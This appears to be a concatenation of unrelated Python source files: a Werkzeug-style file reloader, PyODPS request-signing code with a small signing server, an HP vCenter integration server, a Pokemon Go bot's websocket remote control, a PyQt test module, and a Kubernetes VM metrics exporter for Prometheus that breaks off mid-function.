_log("info", f" * Restarting with {self.name}")
args = _get_args_for_reloading()
new_environ = os.environ.copy()
new_environ["WERKZEUG_RUN_MAIN"] = "true"
exit_code = subprocess.call(args, env=new_environ, close_fds=False)
if exit_code != 3:
return exit_code
def trigger_reload(self, filename: str) -> None:
self.log_reload(filename)
sys.exit(3)
def log_reload(self, filename: str) -> None:
filename = os.path.abspath(filename)
_log("info", f" * Detected change in {filename!r}, reloading")
class StatReloaderLoop(ReloaderLoop):
name = "stat"
def __enter__(self) -> ReloaderLoop:
self.mtimes: t.Dict[str, float] = {}
return super().__enter__()
def run_step(self) -> None:
for name in chain(_find_stat_paths(self.extra_files, self.exclude_patterns)):
try:
mtime = os.stat(name).st_mtime
except OSError:
continue
old_time = self.mtimes.get(name)
if old_time is None:
self.mtimes[name] = mtime
continue
if mtime > old_time:
self.trigger_reload(name)
class WatchdogReloaderLoop(ReloaderLoop):
def __init__(self, *args: t.Any, **kwargs: t.Any) -> None:
from watchdog.observers import Observer
from watchdog.events import PatternMatchingEventHandler
super().__init__(*args, **kwargs)
trigger_reload = self.trigger_reload
class EventHandler(PatternMatchingEventHandler): # type: ignore
def on_any_event(self, event): # type: ignore
trigger_reload(event.src_path)
reloader_name = Observer.__name__.lower()
if reloader_name.endswith("observer"):
reloader_name = reloader_name[:-8]
self.name = f"watchdog ({reloader_name})"
self.observer = Observer()
# Extra patterns can be non-Python files, match them in addition
# to all Python files in default and extra directories. Ignore
# __pycache__ since a change there will always have a change to
# the source file (or initial pyc file) as well. Ignore Git and
# Mercurial internal changes.
extra_patterns = [p for p in self.extra_files if not os.path.isdir(p)]
self.event_handler = EventHandler(
patterns=["*.py", "*.pyc", "*.zip", *extra_patterns],
ignore_patterns=[
"*/__pycache__/*",
"*/.git/*",
"*/.hg/*",
*self.exclude_patterns,
],
)
self.should_reload = False
def trigger_reload(self, filename: str) -> None:
# This is called inside an event handler, which means throwing
# SystemExit has no effect.
# https://github.com/gorakhargosh/watchdog/issues/294
self.should_reload = True
self.log_reload(filename)
def __enter__(self) -> ReloaderLoop:
self.watches: t.Dict[str, t.Any] = {}
self.observer.start()
return super().__enter__()
def __exit__(self, exc_type, exc_val, exc_tb): # type: ignore
self.observer.stop()
self.observer.join()
def run(self) -> None:
while not self.should_reload:
self.run_step()
time.sleep(self.interval)
sys.exit(3)
def run_step(self) -> None:
to_delete = set(self.watches)
for path in _find_watchdog_paths(self.extra_files, self.exclude_patterns):
if path not in self.watches:
try:
self.watches[path] = self.observer.schedule(
self.event_handler, path, recursive=True
)
except OSError:
# Clear this path from list of watches We don't want
# the same error message showing again in the next
# iteration.
self.watches[path] = None
to_delete.discard(path)
for path in to_delete:
watch = self.watches.pop(path, None)
if watch is not None:
self.observer.unschedule(watch)
reloader_loops: t.Dict[str, t.Type[ReloaderLoop]] = {
"stat": StatReloaderLoop,
"watchdog": WatchdogReloaderLoop,
}
try:
__import__("watchdog.observers")
except ImportError:
reloader_loops["auto"] = reloader_loops["stat"]
else:
reloader_loops["auto"] = reloader_loops["watchdog"]
def ensure_echo_on() -> None:
"""Ensure that echo mode is enabled. Some tools such as PDB disable
it which causes usability issues after a reload."""
# tcgetattr will fail if stdin isn't a tty
if sys.stdin is None or not sys.stdin.isatty():
return
try:
import termios
except ImportError:
return
attributes = termios.tcgetattr(sys.stdin)
if not attributes[3] & termios.ECHO:
attributes[3] |= termios.ECHO
termios.tcsetattr(sys.stdin, termios.TCSANOW, attributes)
def run_with_reloader(
main_func: t.Callable[[], None],
extra_files: t.Optional[t.Iterable[str]] = None,
exclude_patterns: t.Optional[t.Iterable[str]] = None,
interval: t.Union[int, float] = 1,
reloader_type: str = "auto",
) -> None:
"""Run the given function in an independent Python interpreter."""
import signal
signal.signal(signal.SIGTERM, lambda *args: sys.exit(0))
reloader = reloader_loops[reloader_type](
extra_files=extra_files, exclude_patterns=exclude_patterns, interval=interval
)
try:
if os.environ.get("WERKZEUG_RUN_MAIN") == "true":
ensure_echo_on()
t = threading.Thread(target=main_func, args=())
t.daemon = True
# Enter the reloader to set up initial state, then start
# the app thread and reloader update loop.
with reloader:
t.start()
reloader.run()
else:
sys.exit(reloader.restart_with_reloader())
except KeyboardInterrupt:
pass
|
accounts.py
|
# Copyright 1999-2017 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A couple of authentication types in ODPS.
"""
import base64
import cgi
import hmac
import hashlib
import logging
import threading
import time
import requests
from .compat import six
from .compat import urlparse, unquote, parse_qsl
from . import compat, utils, options
LOG = logging.getLogger(__name__)
class BaseAccount(object):
def _build_canonical_str(self, url_components, req):
# Build signing string
lines = [req.method, ]
headers_to_sign = dict()
canonical_resource = url_components.path
params = dict()
if url_components.query:
params_list = sorted(parse_qsl(url_components.query, True),
key=lambda it: it[0])
assert len(params_list) == len(set(it[0] for it in params_list))
params = dict(params_list)
convert = lambda kv: kv if kv[1] != '' else (kv[0], )
params_str = '&'.join(['='.join(convert(kv)) for kv in params_list])
canonical_resource = '%s?%s' % (canonical_resource, params_str)
headers = req.headers
LOG.debug('headers before signing: %s' % headers)
for k, v in six.iteritems(headers):
k = k.lower()
if k in ('content-type', 'content-md5') or k.startswith('x-odps'):
headers_to_sign[k] = v
for k in ('content-type', 'content-md5'):
if k not in headers_to_sign:
headers_to_sign[k] = ''
date_str = headers.get('Date')
if not date_str:
req_date = utils.formatdate(usegmt=True)
headers['Date'] = req_date
date_str = req_date
headers_to_sign['date'] = date_str
for param_key, param_value in six.iteritems(params):
if param_key.startswith('x-odps-'):
headers_to_sign[param_key] = param_value
headers_to_sign = compat.OrderedDict([(k, headers_to_sign[k])
for k in sorted(headers_to_sign)])
LOG.debug('headers to sign: %s' % headers_to_sign)
for k, v in six.iteritems(headers_to_sign):
if k.startswith('x-odps-'):
lines.append('%s:%s' % (k, v))
else:
lines.append(v)
lines.append(canonical_resource)
return '\n'.join(lines)
def sign_request(self, req, endpoint):
raise NotImplementedError
class AliyunAccount(BaseAccount):
"""
Account of aliyun.com
"""
def __init__(self, access_id, secret_access_key):
self.access_id = access_id
self.secret_access_key = secret_access_key
def sign_request(self, req, endpoint):
url = req.url[len(endpoint):]
url_components = urlparse(unquote(url), allow_fragments=False)
canonical_str = self._build_canonical_str(url_components, req)
LOG.debug('canonical string: ' + canonical_str)
signature = base64.b64encode(hmac.new(
utils.to_binary(self.secret_access_key), utils.to_binary(canonical_str),
hashlib.sha1).digest())
auth_str = 'ODPS %s:%s' % (self.access_id, utils.to_str(signature))
req.headers['Authorization'] = auth_str
LOG.debug('headers after signing: ' + repr(req.headers))
class SignServer(object):
class SignServerHandler(six.moves.BaseHTTPServer.BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header("Content-type", "text/plain")
self.end_headers()
self.wfile.write(b"PyODPS Account Server")
def do_POST(self):
try:
self._do_POST()
except:
self.send_response(500)
self.end_headers()
def _do_POST(self):
ctype, pdict = cgi.parse_header(self.headers.get('content-type'))
if ctype == 'multipart/form-data':
postvars = cgi.parse_multipart(self.rfile, pdict)
elif ctype == 'application/x-www-form-urlencoded':
length = int(self.headers.get('content-length'))
postvars = six.moves.urllib.parse.parse_qs(self.rfile.read(length), keep_blank_values=1)
else:
self.send_response(400)
self.end_headers()
return
if self.server._token is not None:
auth = self.headers.get('Authorization')
if not auth:
self.send_response(401)
self.end_headers()
return
method, content = auth.split(' ', 1)
method = method.lower()
if method == 'token':
if content != self.server._token:
self.send_response(401)
self.end_headers()
return
else:
self.send_response(401)
self.end_headers()
return
assert len(postvars[b'access_id']) == 1 and len(postvars[b'canonical']) == 1
access_id = utils.to_str(postvars[b'access_id'][0])
canonical = utils.to_str(postvars[b'canonical'][0])
secret_access_key = self.server._accounts[access_id]
signature = base64.b64encode(hmac.new(
utils.to_binary(secret_access_key), utils.to_binary(canonical),
hashlib.sha1).digest())
auth_str = 'ODPS %s:%s' % (access_id, utils.to_text(signature))
self.send_response(200)
self.send_header("Content-Type", "text/json")
self.end_headers()
self.wfile.write(utils.to_binary(auth_str))
def log_message(self, *args):
return
class SignServerCore(six.moves.socketserver.ThreadingMixIn, six.moves.BaseHTTPServer.HTTPServer):
def __init__(self, *args, **kwargs):
self._accounts = kwargs.pop('accounts', {})
self._token = kwargs.pop('token', None)
self._ready = False
six.moves.BaseHTTPServer.HTTPServer.__init__(self, *args, **kwargs)
self._ready = True
def stop(self):
self.shutdown()
self.server_close()
def __init__(self, token=None):
self._server = None
self._accounts = dict()
self._token = token
@property
def server(self):
return self._server
@property
def accounts(self):
return self._accounts
@property
def token(self):
return self._token
def start(self, endpoint):
def starter():
self._server = self.SignServerCore(endpoint, self.SignServerHandler,
accounts=self.accounts, token=self.token)
self._server.serve_forever()
thread = threading.Thread(target=starter)
thread.daemon = True
thread.start()
while self._server is None or not self._server._ready:
time.sleep(0.05)
def stop(self):
self._server.stop()
class SignServerError(Exception):
def __init__(self, msg, code):
super(SignServerError, self).__init__(msg)
self.code = code
class SignServerAccount(BaseAccount):
_session_local = threading.local()
def __init__(self, access_id, sign_endpoint=None, server=None, port=None, token=None):
self.access_id = access_id
self.sign_endpoint = sign_endpoint or (server, port)
self.token = token
@property
def session(self):
if not hasattr(type(self)._session_local, '_session'):
adapter_options = dict(
pool_connections=options.pool_connections,
pool_maxsize=options.pool_maxsize,
max_retries=options.retry_times,
)
session = requests.Session()
# mount adapters with retry times
session.mount(
'http://', requests.adapters.HTTPAdapter(**adapter_options))
session.mount(
'https://', requests.adapters.HTTPAdapter(**adapter_options))
self._session_local._session = session
return self._session_local._session
def sign_request(self, req, endpoint):
url = req.url[len(endpoint):]
url_components = urlparse(unquote(url), allow_fragments=False)
canonical_str = self._build_canonical_str(url_components, req)
LOG.debug('canonical string: ' + canonical_str)
headers = dict()
if self.token:
headers['Authorization'] = 'token ' + self.token
resp = self.session.request('post', 'http://%s:%s' % self.sign_endpoint, headers=headers,
data=dict(access_id=self.access_id, canonical=canonical_str))
if resp.status_code < 400:
req.headers['Authorization'] = resp.text
LOG.debug('headers after signing: ' + repr(req.headers))
else:
raise SignServerError('Sign server returned error code: %d' % resp.status_code, resp.status_code)
|
server.py
|
#!/usr/bin/python
'''
Created on Aug 26, 2011
@author: IslamM
###########################################################################################
#
# server.py
#
# Copyright 2009 Hewlett-Packard Development Company, L.P.
#
# Hewlett-Packard and the Hewlett-Packard logo are trademarks of
# Hewlett-Packard Development Company, L.P. in the U.S. and/or other countries.
#
# Confidential computer software. Valid license from Hewlett-Packard required
# for possession, use or copying. Consistent with FAR 12.211 and 12.212,
# Commercial Computer Software, Computer Software Documentation, and Technical
# Data for Commercial Items are licensed to the U.S. Government under
# vendor's standard commercial license.
#
# Author:
# Mohammed M. Islam
#
# Description:
# Insight Control for vCenter main program!
#
##############################################################################################
'''
# the root directory needs to be set when running as a service.
# Next three lines will take care of that.
import logging, time, socket, os, base64
from util.environment import Environment
env = Environment()
env.set_root_dir()
from util.config import config, crypy
thisconfig = config()
import util.verbose_logging
import logging.config
logging.config.fileConfig( thisconfig.get_log_config_file() ) # Must be before imports that log
from engines.vc_engine import vc_engine
from engines.csc_engine import csc_engine
from engines import ic4vc_webserver
#from engines import data
from engines import threadpool
#from util import cmdline_opt as cmdoptions
import scomponent_server
from threading import Thread
from engines.deployment_connector import ALDeploymentConnector
log = logging.getLogger(__name__)
from util import catalog, soap
from util.smartcomponent import get_scm
from core.classes import obj
class ICVCServer:
def start(self):
log.info('Initializing ...')
if not os.path.exists('static/sc_share'):
os.makedirs('static/sc_share')
socket.setdefaulttimeout(300)
self.cfg = config()
threadpool.create()
self.crp = crypy()
soap.setup()
self.vcenters = []
try:
for vc in self.cfg.get_vcenters():
vcobj = obj()
setattr(vcobj, '__dict__', vc)
self.vcenters.append(vcobj)
except:
log.exception('Unable to retrieve vcenter list from config.json')
for vc in self.vcenters:
try:
vc.username = base64.encodestring(vc.username)
vc.password = base64.encodestring(self.crp.decode(vc.password))
except:
log.exception('Error reading credentials from config.json for vcenter %s', vc.ip)
log.info('Starting vCenters...')
vce = vc_engine(self.vcenters)
vce.start()
log.info('vCenters Started')
csce_t = Thread(target=self.start_csce, name='ICVCServer.start_csce')
csce_t.deamon = True
csce_t.start()
log.info('Starting webserver...')
self.serverwebapp = ic4vc_webserver.ServerWebApp()
self.serverwebapp.start()
log.info('webserver started')
# Start the smart component server
sc_t = Thread(target=scomponent_server.run_server, name="Smart Component HTTP server")
sc_t.daemon = True
sc_t.start()
# Create the deployment connector
ALDeploymentConnector.create()
# Unpack any smart components that the user has added to IC4vC
get_scm().discover_components()
def start_csce(self):
cs_webcfg = self.cfg.get_cswebcfg()
cs_cred = self.cfg.get_cspw()
cs_un = base64.encodestring(cs_cred.username)
cs_pw = base64.encodestring(self.crp.decode(cs_cred.epassword))
csce = csc_engine(cs_un, cs_pw, cs_webcfg)
while True:
try:
csce.send_vcenter_list(self.vcenters, base64.decodestring)
break
except:
log.debug('Unable to start csc_engine, will retry in 120 secs ...', exc_info=1)
time.sleep(120)
csce.start()
def stop(self):
self.serverwebapp.stop()
if __name__ == '__main__':
ic4vc = ICVCServer()
ic4vc.start()
while True:
time.sleep(60)
ic4vc.stop()
|
websocket_remote_control.py
|
import threading
import logging
from socketIO_client import BaseNamespace
from socketIO_client import SocketIO
from pokemongo_bot import inventory
class WebsocketRemoteControl(object):
def __init__(self, bot):
self.bot = bot
self.host, port_str = self.bot.config.websocket_server_url.split(':')
self.port = int(port_str)
self.sio = SocketIO(self.host, self.port)
self.sio.on(
'bot:process_request:{}'.format(self.bot.config.username),
self.on_remote_command
)
self.thread = threading.Thread(target=self.process_messages)
self.logger = logging.getLogger(type(self).__name__)
def start(self):
self.thread.start()
return self
def process_messages(self):
self.sio.wait()
def on_remote_command(self, command):
name = command['name']
command_handler = getattr(self, name, None)
if not command_handler or not callable(command_handler):
self.sio.emit(
'bot:send_reply',
{
'response': '',
'command': 'command_not_found',
'account': self.bot.config.username
}
)
return
if 'args' in command:
command_handler(*args)
return
command_handler()
def get_player_info(self):
try:
self.sio.emit(
'bot:send_reply',
{
'result': {'inventory': inventory.jsonify_inventory(), 'player': self.bot._player},
'command': 'get_player_info',
'account': self.bot.config.username
}
)
except Exception as e:
self.logger.error(e)
|
TestModule.py
|
from EaselModule import EaselModule
from PyQt5.QtGui import QKeyEvent, QMouseEvent, QWheelEvent
import threading
from time import sleep
from tk3dv.common import utilities
import GLViewer as glv
import PyQt5.QtCore as QtCore
class TestModule(EaselModule, argv=None):
def __init__(self, argv=None):
super().__init__()
def init(self):
#print('One-time initialization before startup happens here.')
pass
def step(self):
#print('Step.')
pass
def draw(self):
#print('OpenGL drawing.')
pass
# Some code to manage the module
class TestModuleManager(glv.GLViewer):
def __init__(self):
super().__init__()
self.Module = TestModule()
# Add more modules if needed manually
self.init()
def init(self):
self.isStop = False
self.isPause = False
self.Mutex = threading.Lock()
self.FPS = 0
self.Module.init()
# Add more modules if needed manually
# Start step() thread
self.StepThread = threading.Thread(target=self.start, args=(1,))
self.StepThread.daemon = True
self.StepThread.start()
def start(self, Dummy):
while (self.isStop == False):
if (self.isPause == True):
sleep(0.001) # Prevent CPU throttling
continue
self.stepAll()
def stepAll(self):
startTime = utilities.getCurrentEpochTime()
self.Module.step()
# Add more modules if needed
endTime = utilities.getCurrentEpochTime()
ElapsedTime = (endTime - startTime)
if ElapsedTime < 1000:
sleep(0.001) # Prevent CPU throttling
ElapsedTime += 1000
self.FPS = 1e6 / (ElapsedTime)
def stop(self):
self.Mutex.acquire()
self.isStop = not self.isStop
self.Mutex.release()
if self.StepThread is not None:
self.StepThread.join()
def togglePause(self):
self.Mutex.acquire()
self.isPause = not self.isPause
self.Mutex.release()
def moduleDraw(self):
self.Module.draw()
def keyPressEvent(self, a0: QKeyEvent):
if(a0.key() == QtCore.Qt.Key_Escape):
self.stop()
super().keyPressEvent(a0)
def mousePressEvent(self, a0: QMouseEvent):
super().mousePressEvent(a0)
# Implement class-specific functionality here
def mouseReleaseEvent(self, a0: QMouseEvent):
super().mouseReleaseEvent(a0)
# Implement class-specific functionality here
def mouseMoveEvent(self, a0: QMouseEvent):
super().mouseMoveEvent(a0)
def wheelEvent(self, a0: QWheelEvent):
super().wheelEvent(a0)
|
virt_monitor_in_docker.py
|
import subprocess
import prometheus_client
import os
import sys
import operator
import time
import threading
import threadpool
from prometheus_client.core import CollectorRegistry
from prometheus_client import Gauge,start_http_server,Counter
from kubernetes import config
from json import loads, dumps
sys.path.append("..")
from utils import constants
from utils import logger
from utils.misc import singleton, get_hostname_in_lower_case, list_objects_in_kubernetes, get_field_in_kubernetes_by_index, CDaemon, list_all_disks, runCmdRaiseException, get_hostname_in_lower_case, get_field_in_kubernetes_node
LOG = '/var/log/virtmonitor.log'
logger = logger.set_logger(os.path.basename(__file__), LOG)
TOKEN = constants.KUBERNETES_TOKEN_FILE
PLURAL = constants.KUBERNETES_PLURAL_VM
VERSION = constants.KUBERNETES_API_VERSION
GROUP = constants.KUBERNETES_GROUP
PLURAL_VMP = constants.KUBERNETES_PLURAL_VMP
VERSION_VMP = constants.KUBERNETES_API_VERSION
GROUP_VMP = constants.KUBERNETES_GROUP
SHARE_FS_MOUNT_POINT = constants.KUBEVMM_SHARE_FS_MOUNT_POINT
VDISK_FS_MOUNT_POINT = constants.KUBEVMM_VDISK_FS_MOUNT_POINT
LOCAL_FS_MOUNT_POINT = constants.KUBEVMM_LOCAL_FS_MOUNT_POINT
BLOCK_FS_MOUNT_POINT = constants.KUBEVMM_BLOCK_FS_MOUNT_POINT
HOSTNAME = get_hostname_in_lower_case()
CPU_UTILIZATION = {}
LAST_TAGS = {}
LAST_RESOURCE_UTILIZATION = {}
ALL_VMS_IN_PROMETHEUS = []
thread_pool = threadpool.ThreadPool(10)
# vm_cpu_system_proc_rate = Gauge('vm_cpu_system_proc_rate', 'The CPU rate of running system processes in virtual machine', \
# ['zone', 'host', 'vm', "labels"])
# vm_cpu_usr_proc_rate = Gauge('vm_cpu_usr_proc_rate', 'The CPU rate of running user processes in virtual machine', \
# ['zone', 'host', 'vm', "labels"])
# vm_cpu_idle_rate = Gauge('vm_cpu_idle_rate', 'The CPU idle rate in virtual machine', \
# ['zone', 'host', 'vm', "labels"])
# vm_mem_total_bytes = Gauge('vm_mem_total_bytes', 'The total memory bytes in virtual machine', \
# ['zone', 'host', 'vm', "labels"])
# vm_mem_available_bytes = Gauge('vm_mem_available_bytes', 'The available memory bytes in virtual machine', \
# ['zone', 'host', 'vm', "labels"])
# vm_mem_buffers_bytes = Gauge('vm_mem_buffers_bytes', 'The buffers memory bytes in virtual machine', \
# ['zone', 'host', 'vm', "labels"])
# vm_mem_rate = Gauge('vm_mem_rate', 'The memory rate in virtual machine', \
# ['zone', 'host', 'vm', "labels"])
# vm_disk_read_requests_per_secend = Gauge('vm_disk_read_requests_per_secend', 'Disk read requests per second in virtual machine', \
# ['zone', 'host', 'vm', "labels", 'device'])
# vm_disk_write_requests_per_secend = Gauge('vm_disk_write_requests_per_secend', 'Disk write requests per second in virtual machine', \
# ['zone', 'host', 'vm', "labels", 'device'])
# vm_disk_read_bytes_per_secend = Gauge('vm_disk_read_bytes_per_secend', 'Disk read bytes per second in virtual machine', \
# ['zone', 'host', 'vm', "labels", 'device'])
# vm_disk_write_bytes_per_secend = Gauge('vm_disk_write_bytes_per_secend', 'Disk write bytes per second in virtual machine', \
# ['zone', 'host', 'vm', "labels", 'device'])
# vm_network_receive_packages_per_secend = Gauge('vm_network_receive_packages_per_secend', 'Network receive packages per second in virtual machine', \
# ['zone', 'host', 'vm', "labels", 'device'])
# vm_network_receive_bytes_per_secend = Gauge('vm_network_receive_bytes_per_secend', 'Network receive bytes per second in virtual machine', \
# ['zone', 'host', 'vm', "labels", 'device'])
# vm_network_receive_errors_per_secend = Gauge('vm_network_receive_errors_per_secend', 'Network receive errors per second in virtual machine', \
# ['zone', 'host', 'vm', "labels", 'device'])
# vm_network_receive_drops_per_secend = Gauge('vm_network_receive_drops_per_secend', 'Network receive drops per second in virtual machine', \
# ['zone', 'host', 'vm', "labels", 'device'])
# vm_network_send_packages_per_secend = Gauge('vm_network_send_packages_per_secend', 'Network send packages per second in virtual machine', \
# ['zone', 'host', 'vm', "labels", 'device'])
# vm_network_send_bytes_per_secend = Gauge('vm_network_send_bytes_per_secend', 'Network send bytes per second in virtual machine', \
# ['zone', 'host', 'vm', "labels", 'device'])
# vm_network_send_errors_per_secend = Gauge('vm_network_send_errors_per_secend', 'Network send errors per second in virtual machine', \
# ['zone', 'host', 'vm', "labels", 'device'])
# vm_network_send_drops_per_secend = Gauge('vm_network_send_drops_per_secend', 'Network send drops per second in virtual machine', \
# ['zone', 'host', 'vm', "labels", 'device'])
# storage_pool_total_size_kilobytes = Gauge('storage_pool_total_size_kilobytes', 'Storage pool total size in kilobytes on host', \
# ['zone', 'host', 'pool', 'type'])
# storage_pool_used_size_kilobytes = Gauge('storage_pool_used_size_kilobytes', 'Storage pool used size in kilobytes on host', \
# ['zone', 'host', 'pool', 'type'])
# storage_disk_total_size_kilobytes = Gauge('storage_disk_total_size_kilobytes', 'Storage disk total size in kilobytes on host', \
# ['zone', 'host', 'pool', 'type', 'disk'])
# storage_disk_used_size_kilobytes = Gauge('storage_disk_used_size_kilobytes', 'Storage disk used size in kilobytes on host', \
# ['zone', 'host', 'pool', 'type', 'disk'])
# VMS_CACHE = []
# vm_cpu_system_proc_rate = Gauge('vm_cpu_system_proc_rate', 'The CPU rate of running system processes in virtual machine', \
# ['zone', 'host', 'vm', "owner", "router", "autoscalinggroup", "cluster"])
# vm_cpu_usr_proc_rate = Gauge('vm_cpu_usr_proc_rate', 'The CPU rate of running user processes in virtual machine', \
# ['zone', 'host', 'vm', "owner", "router", "autoscalinggroup", "cluster"])
vm_cpu_idle_rate = Gauge('vm_cpu_idle_rate', 'The CPU idle rate in virtual machine', \
['zone', 'host', 'vm', "owner", "router", "autoscalinggroup", "cluster"])
vm_mem_total_bytes = Gauge('vm_mem_total_bytes', 'The total memory bytes in virtual machine', \
['zone', 'host', 'vm', "owner", "router", "autoscalinggroup", "cluster"])
vm_mem_available_bytes = Gauge('vm_mem_available_bytes', 'The available memory bytes in virtual machine', \
['zone', 'host', 'vm', "owner", "router", "autoscalinggroup", "cluster"])
vm_mem_buffers_bytes = Gauge('vm_mem_buffers_bytes', 'The buffers memory bytes in virtual machine', \
['zone', 'host', 'vm', "owner", "router", "autoscalinggroup", "cluster"])
vm_mem_rate = Gauge('vm_mem_rate', 'The memory rate in virtual machine', \
['zone', 'host', 'vm', "owner", "router", "autoscalinggroup", "cluster"])
vm_disk_read_requests_per_secend = Gauge('vm_disk_read_requests_per_secend', 'Disk read requests per second in virtual machine', \
['zone', 'host', 'vm', "owner", "router", "autoscalinggroup", "cluster", 'device'])
vm_disk_write_requests_per_secend = Gauge('vm_disk_write_requests_per_secend', 'Disk write requests per second in virtual machine', \
['zone', 'host', 'vm', "owner", "router", "autoscalinggroup", "cluster", 'device'])
vm_disk_read_bytes_per_secend = Gauge('vm_disk_read_bytes_per_secend', 'Disk read bytes per second in virtual machine', \
['zone', 'host', 'vm', "owner", "router", "autoscalinggroup", "cluster", 'device'])
vm_disk_write_bytes_per_secend = Gauge('vm_disk_write_bytes_per_secend', 'Disk write bytes per second in virtual machine', \
['zone', 'host', 'vm', "owner", "router", "autoscalinggroup", "cluster", 'device'])
vm_network_receive_packages_per_secend = Gauge('vm_network_receive_packages_per_secend', 'Network receive packages per second in virtual machine', \
['zone', 'host', 'vm', "owner", "router", "autoscalinggroup", "cluster", 'device'])
vm_network_receive_bytes_per_secend = Gauge('vm_network_receive_bytes_per_secend', 'Network receive bytes per second in virtual machine', \
['zone', 'host', 'vm', "owner", "router", "autoscalinggroup", "cluster", 'device'])
vm_network_receive_errors_per_secend = Gauge('vm_network_receive_errors_per_secend', 'Network receive errors per second in virtual machine', \
['zone', 'host', 'vm', "owner", "router", "autoscalinggroup", "cluster", 'device'])
vm_network_receive_drops_per_secend = Gauge('vm_network_receive_drops_per_secend', 'Network receive drops per second in virtual machine', \
['zone', 'host', 'vm', "owner", "router", "autoscalinggroup", "cluster", 'device'])
vm_network_send_packages_per_secend = Gauge('vm_network_send_packages_per_secend', 'Network send packages per second in virtual machine', \
['zone', 'host', 'vm', "owner", "router", "autoscalinggroup", "cluster", 'device'])
vm_network_send_bytes_per_secend = Gauge('vm_network_send_bytes_per_secend', 'Network send bytes per second in virtual machine', \
['zone', 'host', 'vm', "owner", "router", "autoscalinggroup", "cluster", 'device'])
vm_network_send_errors_per_secend = Gauge('vm_network_send_errors_per_secend', 'Network send errors per second in virtual machine', \
['zone', 'host', 'vm', "owner", "router", "autoscalinggroup", "cluster", 'device'])
vm_network_send_drops_per_secend = Gauge('vm_network_send_drops_per_secend', 'Network send drops per second in virtual machine', \
['zone', 'host', 'vm', "owner", "router", "autoscalinggroup", "cluster", 'device'])
storage_pool_total_size_kilobytes = Gauge('storage_pool_total_size_kilobytes', 'Storage pool total size in kilobytes on host', \
['zone', 'host', 'pool', 'type'])
storage_pool_used_size_kilobytes = Gauge('storage_pool_used_size_kilobytes', 'Storage pool used size in kilobytes on host', \
['zone', 'host', 'pool', 'type'])
storage_disk_total_size_kilobytes = Gauge('storage_disk_total_size_kilobytes', 'Storage disk total size in kilobytes on host', \
['zone', 'host', 'pool', 'type', 'disk'])
storage_disk_used_size_kilobytes = Gauge('storage_disk_used_size_kilobytes', 'Storage disk used size in kilobytes on host', \
['zone', 'host', 'pool', 'type', 'disk'])
class KillableThread:
def __init__(self, target, args=None):
self.th = threading.Thread(target=target, args=args)
self.kill_sema = threading.Semaphore(0)
self.start_sema = threading.Semaphore(0)
def daemon_thread(self):
self.th.setDaemon(True)
self.th.start()
self.start_sema.release()
self.kill_sema.acquire()
self.guard = threading.Thread(target=daemon_thread, args=(self,))
def start(self):
self.guard.start()
self.start_sema.acquire()
def join(self, secs=None):
self.th.join(secs)
if not self.th.is_alive():
self.kill_sema.release()
def is_alive(self):
return self.th.is_alive() and self.guard.is_alive()
def kill(self):
self.kill_sema.release()
while self.guard.is_alive():
pass
def collect_storage_metrics(zone):
config.load_kube_config(config_file=TOKEN)
vmps = list_objects_in_kubernetes(GROUP_VMP, VERSION_VMP, PLURAL_VMP)
# storages = {VDISK_FS_MOUNT_POINT: 'vdiskfs', SHARE_FS_MOUNT_POINT: 'nfs/glusterfs', \
# LOCAL_FS_MOUNT_POINT: 'localfs', BLOCK_FS_MOUNT_POINT: 'blockfs'}
for vmp in vmps:
try:
# all_pool_storages = runCmdRaiseException('timeout 2 df -aT | grep %s | awk \'{print $3,$4,$7}\'' % mount_point)
(vmp_mount_point, vmp_type, vmp_uuid, vmp_nodename) = _get_pool_details(vmp)
if get_hostname_in_lower_case() != vmp_nodename:
continue
output = runCmdRaiseException('timeout 2 cstor-cli pool-show --poolname %s' % vmp_uuid)
if output:
vmp_utils = loads(output[0])
pool_total, pool_used = int(vmp_utils['data'].get('total'))/1024, int(vmp_utils['data'].get('used'))/1024
t = KillableThread(target=get_pool_metrics,args=(pool_total, pool_used, vmp_mount_point, vmp_type, zone,))
t.start()
t.join(2)
t.kill()
except Exception as e:
logger.warning('Oops! ', exc_info=1)
raise e
# get_pool_metrics(pool_storage, pool_type, zone)
def _get_pool_details(vm_pool):
try:
return (vm_pool['metadata'].get('name'), vm_pool['spec']['pool'].get('pooltype'),
vm_pool['spec']['pool'].get('poolname'), vm_pool['spec'].get('nodeName'))
except:
logger.warning('Oops! ', exc_info=1)
return (None, None, None, None)
def get_pool_metrics(pool_total, pool_used, pool_mount_point, pool_type, zone):
# global storage_pool_total_size_kilobytes
# global storage_pool_used_size_kilobytes
storage_pool_total_size_kilobytes.labels(zone, HOSTNAME, pool_mount_point, pool_type).set(pool_total)
storage_pool_used_size_kilobytes.labels(zone, HOSTNAME, pool_mount_point, pool_type).set(pool_used)
collect_disk_metrics(pool_mount_point, pool_type, zone)
def collect_disk_metrics(pool_mount_point, pool_type, zone):
if pool_type in ['vdiskfs', 'nfs/glusterfs', 'localfs']:
disk_list = list_all_disks(pool_mount_point, 'f')
disk_type = 'file'
else:
disk_list = list_all_disks(pool_mount_point, 'l')
disk_type = 'block'
for disk in disk_list:
get_vdisk_metrics(pool_mount_point, disk_type, disk, zone)
# t = threading.Thread(target=get_vdisk_metrics,args=(pool_mount_point, disk_type, disk, zone,))
# t.setDaemon(True)
# t.start()
# t.join()
# vdisk_fs_list = list_all_vdisks(VDISK_FS_MOUNT_POINT, 'f')
# for disk in vdisk_fs_list:
# t1 = threading.Thread(target=get_vdisk_metrics,args=(disk, zone,))
# t1.setDaemon(True)
# t1.start()
# local_fs_list = list_all_vdisks(LOCAL_FS_MOUNT_POINT, 'f')
# for disk in local_fs_list:
# t1 = threading.Thread(target=get_vdisk_metrics,args=(disk, zone,))
# t1.setDaemon(True)
# t1.start()
# resource_utilization = {'host': HOSTNAME, 'vdisk_metrics': {}}
def get_vdisk_metrics(pool_mount_point, disk_type, disk, zone):
# global storage_disk_total_size_kilobytes
# global storage_disk_used_size_kilobytes
try:
output = loads(runCmdRaiseException('timeout 2 qemu-img info -U --output json %s' % (disk), use_read=True))
# output = loads()
# print(output)
except:
output = {}
if output:
virtual_size = float(output.get('virtual-size')) / 1024 if output.get('virtual-size') else 0.00
